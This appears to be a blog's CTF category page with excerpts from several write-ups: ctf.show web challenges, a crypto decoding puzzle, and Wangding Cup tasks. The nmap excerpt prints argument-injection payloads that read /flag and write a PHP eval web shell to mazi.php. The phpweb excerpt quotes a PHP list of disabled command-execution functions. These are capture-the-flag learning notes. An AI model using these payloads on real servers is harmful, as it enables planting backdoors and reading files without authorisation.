CTF
文章平均质量分 64
god_mellon
这个作者很懒,什么都没留下…
展开
-
python相关函数
【代码】python相关函数。原创 2022-11-14 15:00:46 · 175 阅读 · 0 评论 -
ctf.show刷题记录_web(1-10)
`https://ctf.show/2、web2正常页面:3个字段,返回来再看一下获取字段值flag:3、web3看题,属于代码审计文件操作漏洞根据代码判断,最典型的远程文件包含漏洞利用方式有两种:利用:在GET请求url参数里面传入远程文件包含还有一种PHP输入输出流的利用方式,可以直接执行POST代码,这里我们仍然用上面这个代码测试,只要执行POST请求pastdata:php常见命令执行函数flag:4、ctf.show_web4页面和web3一样,原创 2022-06-28 14:46:05 · 645 阅读 · 0 评论 -
crypto14解题思路
crypto14解题思路##二进制001100110011001100100000001101000011010100100000001101010011000000100000001100100110011000100000001100110011001100100000001101010011011000100000001101000110010100100000001101000011011000100000001101000011011000100000001101100110010000100原创 2021-11-20 07:57:30 · 575 阅读 · 1 评论 -
网鼎杯朱雀组-GO
这里猜测是魔改base64尝试替换回去import stringimport base64new="XYZFGHI2+/Jhi345jklmEnopuvwqrABCDKL6789abMNWcdefgstOPQRSTUVxyz01"old="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"key="nRKKAHzMrQzaqQzKpPHClX"keyb64=""for i in key: keyb6.原创 2020-05-25 16:33:47 · 410 阅读 · 0 评论 -
网鼎杯-phpweb
找了一些php读取文件的函数尝试读取源码,试了一个readfile就成功了<?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_原创 2020-05-25 15:06:56 · 329 阅读 · 0 评论 -
网鼎杯-nmap
Web0x01 nmap查看源码提示:研究了半天分隔符绕过,后来放弃了,根据题目提示(127.0.01,不用扫外网),尝试扫描/flag并尝试将其输出到1.txt中-iL /flag -oN 1.txt尝试失败之后继续尝试闭合一下127.0.0.1' -iL /flag -oN szgyy.txt '传马' <?php @eval($_POST["mazi"]);?> -oG mazi.php '' <?= @eval($_POST["password"]);?>原创 2020-05-25 14:37:31 · 456 阅读 · 1 评论